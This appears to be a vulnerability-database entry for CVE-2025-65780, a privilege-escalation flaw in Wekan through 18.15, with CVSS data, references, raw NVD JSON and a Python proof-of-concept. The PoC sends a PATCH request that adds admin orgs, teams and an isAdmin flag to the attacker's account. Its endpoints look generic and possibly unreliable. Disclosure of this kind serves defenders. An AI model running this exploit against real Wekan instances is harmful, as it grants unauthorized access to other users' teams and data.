CVE-2025-65780

Description

An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:* - VULNERABLE

Wekan < 18.16

Wekan <= 18.15 (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-65780 PoC - Wekan Privilege Escalation via Missing Authorization # Affected: Wekan <= 18.15 # This PoC demonstrates how an authenticated low-privilege user can escalate privileges import requests import json TARGET_URL = "https://your-wekan-instance.com" ATTACKER_USERNAME = "[email protected]" ATTACKER_PASSWORD = "password123" def get_auth_token(): """Authenticate and obtain session token""" login_url = f"{TARGET_URL}/api/v1/login" payload = { "user": {"username": ATTACKER_USERNAME}, "password": ATTACKER_PASSWORD } response = requests.post(login_url, json=payload) if response.status_code == 200: data = response.json() return data.get("token"), data.get("userId") return None, None def escalate_privilege(token, user_id): """Exploit missing authorization to modify privileged fields""" update_url = f"{TARGET_URL}/api/v1/users/{user_id}" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload - updating privileged fields beyond profile malicious_payload = { "profile": { "invalid2": "test" }, "orgs": ["admin-org"], # Privilege escalation: join admin organization "teams": ["admin-team"], # Access unauthorized teams "loginDisabled": False, # Prevent account lockout "isAdmin": True # Attempt to gain admin privileges } response = requests.patch(update_url, headers=headers, json=malicious_payload) return response.status_code, response.text def main(): print("[*] CVE-2025-65780 Wekan Privilege Escalation PoC") token, user_id = get_auth_token() if not token: print("[-] Authentication failed") return print(f"[+] Authenticated as user: {user_id}") status, response = escalate_privilege(token, user_id) if status == 200: print("[+] Privilege escalation successful!") print(f"[+] Response: {response}") else: print(f"[-] Exploit failed with status {status}") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65780
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65780
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65780/
[4] VulDB https://vuldb.com/cve/CVE-2025-65780
[5] https://github.com/wekan/wekan
[6] https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release
[7] https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81
[8] https://wekan.fi/hall-of-fame/spacebleed/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65780", "sourceIdentifier": "[email protected]", "published": "2025-12-15T14:15:57.450", "lastModified": "2025-12-18T01:37:10.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wekan_project:wekan:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.16", "matchCriteriaId": "F031B735-9703-4B9D-BDE9-CC4226B5EBD0"}]}]}], "references": [{"url": "https://github.com/wekan/wekan", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://wekan.fi/hall-of-fame/spacebleed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}